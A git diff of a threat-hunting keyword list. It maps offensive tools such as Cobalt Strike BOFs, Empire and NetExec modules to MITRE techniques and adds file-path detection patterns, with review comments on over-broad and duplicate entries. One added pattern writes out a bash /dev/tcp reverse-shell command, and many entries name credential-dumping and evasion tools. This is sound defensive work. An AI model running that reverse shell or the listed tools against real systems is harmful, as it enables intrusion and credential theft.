and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "SprayAD * * ","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" "SprayAD.exe *","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","0","N/A","10","10","885","152","2023-05-03T19:35:38Z","2022-04-22T13:43:35Z" -"sudomy 
-*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","N/A","N/A","10","1718","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" -"SwampThing.csproj","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"sudomy -*","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","N/A","N/A","10","1720","352","2023-09-19T08:38:55Z","2019-07-26T10:26:34Z" +"SwampThing.csproj","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "TokenStrip *","offensive_tool_keyword","cobaltstrike","Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","0","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" "token-vault create*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "token-vault remove*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" 
@@ -18788,5 +18978,5 @@ "token-vault use*","offensive_tool_keyword","cobaltstrike","In-memory token vault BOF for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Henkru/cs-token-vault","1","0","N/A","10","10","128","25","2022-08-18T11:02:42Z","2022-07-29T17:50:10Z" "uselistener http*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 
- T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "usemodule */*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"usestager *","offensive_tool_keyword","empire","Empire commands. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"wapiti -*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"usestager *","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"wapiti -*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" diff --git a/only_keywords.txt b/only_keywords.txt index 9866166f6..40ce1796b 100644 --- a/only_keywords.txt +++ b/only_keywords.txt @@ -2604,6 +2604,7 @@ */.manspider/loot* */.msf4/* */.ntdissector* +*/.nxc/obfuscated_scripts/* */.sliver/logs* */.ssh/RAI.pub* *//:ptth* 
@@ -2646,6 +2647,7 @@ */ADACLScanner.git* */adalanche/modules/* */adconnectdump.git* +*/adcs.py* */adcs_enum/* */adcs_request/adcs_request.* */adcs_request/CertCli.* @@ -2654,6 +2656,7 @@ */adcs-enum.py* */ADCSKiller* */ADCSPwn.git* +*/add_computer.py* */add_groupmember.py* */address-info.nse* */AddUser-Bof.* @@ -2885,13 +2888,16 @@ */BesoToken.exe* */BesoToken.git* */bettercap* +*/bh_owned.py* */bhqc.py -* */BIFFRecordEncryption.cs* */bin/0d1n* */bin/AceLdr* +*/bin/bash -c 'bash -i >& /dev/tcp/*/* 0>&1'* */bin/fake-sms* */bin/gorsair * */bin/hakrawler* +*/bin/nxcdb* */bin/posh* */bin/pupysh* */bin/read_i.php?a1=step2-down-b&a2=* @@ -3307,6 +3313,7 @@ */D1rkInject.git* */d4em0n/exrop* */daap-get-library.nse* +*/daclread.py* */DAMP.git* */DanMcInerney/ridenum* */daphne.git* @@ -3322,6 +3329,7 @@ */data/auxiliary/gather* */data/empire.db* */data/exploits/* +*/data/nxc.conf* */data/shellcode* */DavRelayUp.git* */DavRelayUp/* @@ -3375,6 +3383,7 @@ */detect-hooks.h* */Detect-Hooks/* */DFSCoerce.git* +*/dfscoerce.py* */dhcp-discover.nse* */Dialogs/Payload.hpp* */dicom-brute.nse* @@ -3480,6 +3489,7 @@ */drda-brute.nse* */drda-info.nse* */Drones/SleepDialogue.razor* +*/drop-sc.py* */drunkpotato* */dsniff.c* */dsniff.services* @@ -3535,6 +3545,7 @@ */Empire.git */empire/client/* */empire:latest* +*/empire_exec.py* */EmpireProject* */enable-user.py* */enableuser/enableuser.x64.* @@ -3545,7 +3556,9 @@ */enum__secrets/*.py* */enum_av.md* */enum_av.py* +*/enum_av.py* */enum_cisco.md* +*/enum_dns.py* */enum_domain_info* */enum_f5.md* */enum_juniper.md* @@ -3653,6 +3666,7 @@ */FilelessPELoader* */final_shellcode_size.txt* */find_domain.sh* +*/find-computer.py* */FindModule.c* */FindObjects.cna* */FindSQLSrv.py* @@ -3720,6 +3734,7 @@ */Gemail-Hack.git* */GetBrowsers.ps1* */get-clipboard.py* +*/get-desc-users.py* */getLegit/cdnl* */getLegit/grkg* */getLegit/prvw* 
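Review bot: The added `*/adcs.py*` in the hunk at `-2646,6 +2647,7` is a bare file-name pattern, so it matches any path ending in a file of that name, not only the tool it is meant to flag. The same applies to `*/add_computer.py*` in the next hunk and to later additions such as `*/impersonate.py*`, `*/msol.py*`, `*/procdump.py*`, `*/rdp.py*` and `*/spooler.py*`. These look like module names of the tool behind the `nxc` entries added in this commit (inferred; the page does not say so), and names this short will collide with unrelated Python projects in file-path or proxy telemetry. Scoping each one by its parent directory, the way `*/nxc/parsers/ip.py*` is written in a later hunk, would keep the coverage and cut false positives; a constructed example of the shape is `*/<tool-dir>/<module-dir>/adcs.py*`.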
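Review bot: The hunk at `-3545,7 +3556,9` adds `*/enum_av.py*` directly below an identical existing `*/enum_av.py*` line, so the list now carries that keyword twice. The same happens with `*/ntlmv1.py*` in the hunk at `-4716,6 +4754,7` and with `*/shadowcoerce.py*` in the hunk at `-5333,6 +5388,7`. Duplicates do not widen detection, but they can produce double hits or trip a uniqueness check in whatever consumes the list. Drop the three added lines, or de-duplicate the file as part of generating it.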
@@ -3864,6 +3879,8 @@ */goZulipC2.git* */GPOddity.git* */GPOddity/* +*/gpp_autologin.py* +*/gpp_password.py* */gpp-decrypt* */gpsd-info.nse* */GreatSCT/* @@ -3895,9 +3912,11 @@ */Hak5.sh* */hakrawler.git* */hancitor.profile* +*/handlekatz.py* */HandleKatz_BOF* */HarmJ0y* */HaryyUser.exe* +*/hash_spider.py* */hashcat* */hashdump_dc* */Hashi0x/* @@ -4122,6 +4141,7 @@ */imfiver/CVE-2022-0847* */impacket.* */impacket/* +*/impersonate.py* */impersonate-rs* */imperun * *cmd.exe /c whoami* */Imperva_gzip_WAF_Bypass* @@ -4173,6 +4193,7 @@ */instabrute.py* */instainsane.git* */instainsane.sh* +*/install_elevated.py* */install-sb.sh* */insTof.py* */interactive_shell.py* @@ -4189,6 +4210,7 @@ */Invoke-HostEnum.ps1* */Invoke-RunAs.ps1* */Invoke-SMBRemoting.git* +*/IOXIDResolver.py* */ip_spoof.rb* */IPayloadService.* */ip-forwarding.nse* @@ -4261,7 +4283,9 @@ */kdstab.* */KDStab.* */KDStab/* +*/keepass_discover.py* */keepass_discover_*.txt* +*/keepass_trigger.py* */KeeThief.git* */kerberoast.* */kerberoast.c* @@ -4325,6 +4349,7 @@ */lansearch.exe* */laps.py *--ldapserver* */laps.py *-u * -p * +*/laps.py* */laps_dump_*.txt* */LAPSDumper.git* */lastpass.py* @@ -4337,6 +4362,7 @@ */ldap_injection.txt* */ldap_search_bof.py* */ldap-brute.nse* +*/ldap-checker.py* */ldap-novell-getpass.nse* */LdapRelayScan.git* */ldap-rootdse.nse* @@ -4398,6 +4424,7 @@ */LSASSProtectionBypass/CredGuard.c* */LsassSilentProcessExit.git* */lsassy* +*/lsassy_dump.py* */lucksec/CVE-2022-0847* */lu-enum.nse* */luijait/arpspoofing* @@ -4436,6 +4463,7 @@ */manspider_*.log* */manspider_output*.txt */manspiderDump* +*/masky.py* */master/GPSCoordinates/* */master/JunctionFolder/* */master/PhantomService/* @@ -4455,6 +4483,7 @@ */merlin.js* */merlin.py* */merlin/agent_code/* +*/met_inject.py* */Metasploit* */metasploit/* */metasploit-framework/embedded/framework* @@ -4525,6 +4554,7 @@ */Mr-Un1k0d3r/* */Mr-xn/cve-2022-23131* */MS15-034.nse* +*/ms17-010.py* */msf.go */msf.swf* */msfcrawler* 
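Review bot: The new `*/laps.py*` in the hunk at `-4325,6 +4349,7` is a superset of the two lines above it, `*/laps.py *--ldapserver*` and `*/laps.py *-u * -p *`, so every event those match now also matches the broad entry. If the specific lines were kept for their lower false-positive rate, the broad one undoes that. If the broad match is intended, the two specific lines are redundant and can be removed. Either way the wider entry is safer when scoped by its parent directory rather than by file name alone.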
@@ -4536,9 +4566,13 @@ */Mshikaki.git* */mshta.cmd* */mshtajs.cmd* +*/msi_search.ps1* +*/msi-search.git* */msLDAPDump* +*/msol.py* */MSOLSpray* */msrpc-enum.nse* +*/mssql_priv.py* */ms-sql-brute.nse* */ms-sql-config.nse* */ms-sql-dac.nse* @@ -4581,6 +4615,7 @@ */n1nj4sec/pupy* */nanodump* */nanodump.* +*/nanodump.py* */nanorobeus.git* */nanorubeus/* */Native/SigFlip/* @@ -4612,6 +4647,7 @@ */netbus-version.nse* */netcreds.py* */NetExec.git* +*/netexec.py* */NetExec-main* */Net-GPPPassword.git* */nethunter-images/* @@ -4680,6 +4716,7 @@ */NoFilter.sln* */NoFilter.vcxproj* */nopac.exe +*/nopac.py* */No-PowerShell.cs* */No-PowerShell.exe* */nopowershell.git* @@ -4702,6 +4739,7 @@ */NTDLLReflection.git* */NtdllUnpatcher.git* */ntds_dump_*.txt* +*/ntdsutil.py* */ntlm.py* */ntlmquic* */NTLMRecon* @@ -4716,6 +4754,7 @@ */ntlmutil.py* */ntlmutil.py* */ntlmv1.py* +*/ntlmv1.py* */ntp-info.nse* */ntp-monlist.nse* */NtQuerySystemInformation.md* @@ -4726,6 +4765,10 @@ */Nuages_Cli* */nuagesAPI.js* */nxc --help* +*/nxc.exe* +*/nxc/parsers/ip.py* +*/nxc/parsers/nmap.py* +*/nxc-ubuntu-latest* */nysm bash* */nysm -dr socat TCP4-LISTEN* */nysm -r ssh *@* @@ -4818,6 +4861,7 @@ */parrot-on-docker/* */parrotsec/* */ParsedMalleableData.txt* +*/parsers/nessus.py* */pass_gen.pl* */PassDetective.git* */passhash.sl* @@ -4868,6 +4912,7 @@ */persistence2.rc* */peterspbr/dirty-pipe-otw* */PetitPotam.git* +*/petitpotam.py* */PEzor.cna* */PEzor.git* */PEzor.sh * @@ -4960,6 +5005,7 @@ */printerbug.py* */PrintMonitorDll.* */PrintMonitorDll/* +*/printnightmare.py* */PrintSpoofer.git* */PrintSpoofer.git* */PrintSpoofer/* @@ -4974,6 +5020,7 @@ */PrivKit.git* */PrivKit/* */proberbyte.go* +*/procdump.py* */process_herpaderping/* */process_killer.cpp* */processhacker-*-bin.zip* 
@@ -5103,9 +5150,12 @@ */rawrpc.py* */RC4BinaryEncryption.cs* */RC4Payload32.txt* +*/rcat-v*-win-x86_64.exe* */RCStep/CSSG/* +*/rdcman.py* */RDE1.git* */rdll_template* +*/rdp.py* */RDPassSpray.git* */RDPCredentialStealer.git* */rdp-enum-encryption.nse* @@ -5150,6 +5200,7 @@ */reGeorg.git* */RegistryPersistence.c* */Registry-Recon/* +*/reg-query.py* */regreeper.jpg* */Reg-Restore-Persistence-Mole* */regsvcs/meterpreter* @@ -5241,6 +5292,7 @@ */RunasCs.git* */RunasCs.git* */RunasCs.zip* +*/runasppl.py* */RunAsWinTcb.git* */RunAsWinTcb.iml* */runcalc.dll* @@ -5250,6 +5302,7 @@ */runshellcode.* */RuralBishop.git* */rusers.nse* +*/rustcat/releases/latest/download/* */rusthound.exe* */RustHound.git* */rvrsh3ll/* @@ -5278,6 +5331,7 @@ */scanner/portscan* */scanner/winrm* */scannerPort.go* +*/scan-network.py* */Scans/servers_all_smb*.txt* */ScareCrow -I * */sccmhunter* @@ -5295,6 +5349,7 @@ */ScRunHex.py* */scshell* */scshell.py* +*/scuffy.py* */searchsploit* */Seatbelt.txt* */Seatbelt/Commands* @@ -5333,6 +5388,7 @@ */sh_executor/*.go* */s-h-3-l-l/* */shadowcoerce.py* +*/shadowcoerce.py* */ShadowForgeC2* */ShadowSpray.git* */ShadowSpray/*.cs* @@ -5461,6 +5517,7 @@ */sleep_python_bridge/* */Sleeper/Sleeper.cna* */sleepmask.cna* +*/slinky.py* */SlinkyCat.git* */sliver.git* */sliver.pb.go* @@ -5574,6 +5631,7 @@ */spellgen.py * */spellstager.py * */spider.yaml* +*/spider_plus.py* */SpiderFoot-*.log.cs* */SpiderFoot.csv* */spiderfoot.git* @@ -5584,6 +5642,7 @@ */spoof/mdns* */spoof/spoof_windows.* */SpookFlare.git* +*/spooler.py* */spoolsystem/SpoolTrigger/* */spray/spray.py* */Spray365* @@ -5622,6 +5681,7 @@ */src/nysm.c* */src/RecycledGate.h* */src/Sleeper.cpp* +*/src/unixshell.rs* */srdi-shellcode.go* */ssh2-enum-algos.nse* */ssh-auth-methods.nse* @@ -5722,6 +5782,7 @@ */tcpshell.py* */Teamphisher.txt* */Teamphisher/targets.txt* +*/teams_localdb.py* */teamserver-linux.tar.gz* */teamserver-win.zip* */teamspeak2-version.nse* 
@@ -5836,6 +5897,7 @@ */tso-enum.nse* */tweetshell.sh* */twittor.git* +*/uac.py* */UACBypasses/* */UACME.git* */UAC-SilentClean/* @@ -5884,6 +5946,7 @@ */vajra/phishApp.py* */var/lib/ptunnel* */var/log/exegol/*.log* +*/veeam_dump.py* */Vegile.git* */venom.git* */venom.sh * @@ -5937,14 +6000,17 @@ */WDExtract.git* */wdextract32.exe* */wdextract64.exe* +*/wdigest.py* */WdToggle.c* */WdToggle.h* */weakpass.git* */Web/decouverte.txt* */Web/discovery.txt* */web/pwn.html* +*/web_delivery.py* */web_rce.py* */WebC2.cs* +*/webdav.py* */WebDavC2.git* */web-hacking-toolkit* */weblistener.py* @@ -5963,6 +6029,7 @@ */WfpTokenDup.exe* */whatlicense.git* */WheresMyImplant/* +*/whoami.py* */WhoAmI.task* */whois-domain.nse* */whois-ip.nse* @@ -5998,7 +6065,9 @@ */winrm.py* */winrmdll* */winrm-reflective-dll/* +*/winscp_dump.py* */Winsocky.git* +*/wireless.py* */wiresocks.git* */wmeye/* */WMI Lateral Movement/* @@ -6053,6 +6122,7 @@ */zejius/5GPR0iy9/fJsnC6G4sFg2wsyn4shb.bin* */zerologon.cna* */zerologon.py* +*/zerologon.py* */zhzyker/CVE-2020-5902* */zsh_executor/*.go* */zwjjustdoit/cve-2022-23131* @@ -6070,6 +6140,7 @@ *?PSAmsi*PSReflect.ps1* *?sample_sliver.json* *[!] Failed to enumerate Credman:* +*[!] Dumping the ntds can crash the DC on Windows Server 2019. Use the option* *[!] Failed to download legitimate GPO from SYSVOL (dc_ip:* *[!] Failed to write malicious scheduled task to downloaded GPO. Exiting* *[#] Ready For ETW Patch.* @@ -6165,7 +6236,9 @@ *\9.dll *\9.exe *\AbandonedCOMKeys.* +*\adcs.py* *\ADCSPwn* +*\add_computer.py* *\ADFSpoof.py* *\ADFSpray* *\ADGet.exe* @@ -6211,6 +6284,7 @@ *\BesoToken.cpp* *\BesoToken.exe* *\BesoToken.vcxproj* +*\bh_owned.py* *\bin\cme.exe* *\bin\shepard\* *\BITB-main* @@ -6268,6 +6342,7 @@ *\CurrentVersion\Uninstall\FreeFileSync_is1* *\CustomEncoding.cpp* *\D1rkInject\* +*\daclread.py* *\darkexe.py* *\DarkLoadLibrary.* *\dcrypt.exe* 
